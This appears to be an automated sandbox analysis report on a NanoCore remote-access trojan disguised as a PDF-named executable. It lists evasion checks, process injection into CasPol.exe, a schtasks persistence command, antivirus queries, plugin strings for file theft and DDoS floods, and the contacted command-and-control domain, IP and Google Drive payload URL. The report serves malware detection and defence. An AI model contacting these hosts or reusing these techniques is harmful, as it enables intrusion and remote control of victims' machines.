    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4876Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4876Thread sleep time: -74900s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7080Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 1498Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 562Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 979Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00406555 FindFirstFileW,FindClose,2_2_00406555
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405A03
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_0040287E FindFirstFileW,2_2_0040287E
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_2-4337
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_2-4495
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
    Source: CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167744785159.0000000007162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, 00000002.00000002.167633646699.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00405840 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,2_2_00405840
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 1160000Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmpJump to behavior
    Source: CasPol.exe, 00000008.00000003.167669662973.0000000039FEB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167530325327.0000000039FEB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167529839560.0000000039FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040344A
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

    Remote Access Functionality

    barindex
    Detected Nanocore Rat
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
    Source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Disable or Modify Tools    		OS Credential Dumping3
    File and Directory Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Ingress Tool Transfer    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API    		1
    Scheduled Task/Job    		1
    Access Token Manipulation    		1
    Obfuscated Files or Information    		LSASS Memory4
    System Information Discovery    		Remote Desktop Protocol1
    Clipboard Data    		Exfiltration Over Bluetooth11
    Encrypted Channel    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Scheduled Task/Job    		1
    Registry Run Keys / Startup Folder    		112
    Process Injection    		1
    DLL Side-Loading    		Security Account Manager211
    Security Software Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Standard Port    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)1
    Scheduled Task/Job    		11
    Masquerading    		NTDS1
    Process Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer1
    Remote Access Software    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon Script1
    Registry Run Keys / Startup Folder    		121
    Virtualization/Sandbox Evasion    		LSA Secrets121
    Virtualization/Sandbox Evasion    		SSHKeyloggingData Transfer Size Limits2
    Non-Application Layer Protocol    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Access Token Manipulation    		Cached Domain Credentials1
    Application Window Discovery    		VNCGUI Input CaptureExfiltration Over C2 Channel113
    Application Layer Protocol    		Jamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items112
    Process Injection    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
    Hidden Files and Directories    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 798398 Sample: DPR602859651100125001V11001... Startdate: 04/02/2023 Architecture: WINDOWS Score: 100 38 googlehosted.l.googleusercontent.com 2->38 40 drive.google.com 2->40 42 doc-0c-b0-docs.googleusercontent.com 2->42 56 Snort IDS alert for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 6 other signatures 2->62 9 DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe 3 34 2->9         started        13 CasPol.exe 4 2->13         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\System.dll, PE32 9->36 dropped 64 Writes to foreign memory regions 9->64 66 Tries to detect Any.run 9->66 15 CasPol.exe 1 22 9->15         started        20 CasPol.exe 9->20         started        22 conhost.exe 13->22         started        signatures6 process7 dnsIp8 44 masterpat0nms672ns.duckdns.org 91.193.75.146, 3498, 49857 DAVID_CRAIGGG Serbia 15->44 46 drive.google.com 142.250.185.110, 443, 49855 GOOGLEUS United States 15->46 48 googlehosted.l.googleusercontent.com 142.250.186.161, 443, 49856 GOOGLEUS United States 15->48 30 C:\Users\user\AppData\Local\...\Windowss.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\Roaming\...\run.dat, data 15->32 dropped 34 C:\Users\user\AppData\Local\...\tmp673D.tmp, XML 15->34 dropped 50 Tries to detect Any.run 15->50 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->52 24 schtasks.exe 1 15->24         started        26 conhost.exe 15->26         started        54 Uses schtasks.exe or at.exe to add and modify task schedules 20->54 file9 signatures10 process11 process12 28 conhost.exe 24->28         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe46%VirustotalBrowse
    DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe47%ReversingLabsWin32.Trojan.Nsisx

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll1%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exe47%ReversingLabsWin32.Trojan.Nsisx
    C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exe46%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    drive.google.com
    		142.250.185.110
    		truefalse
      		high
      masterpat0nms672ns.duckdns.org
      		91.193.75.146
      		truetrue
        		unknown
        googlehosted.l.googleusercontent.com
        		142.250.186.161
        		truefalse
          		high
          doc-0c-b0-docs.googleusercontent.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://doc-0c-b0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qt6iu260mrr5822id2hevfvup/1675479375000/07900185898442636486/*/1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy?e=download&uuid=5cfb3928-a799-4c74-b6f0-f4c0849b8739false
              		high

              URLs from Memory and Binaries

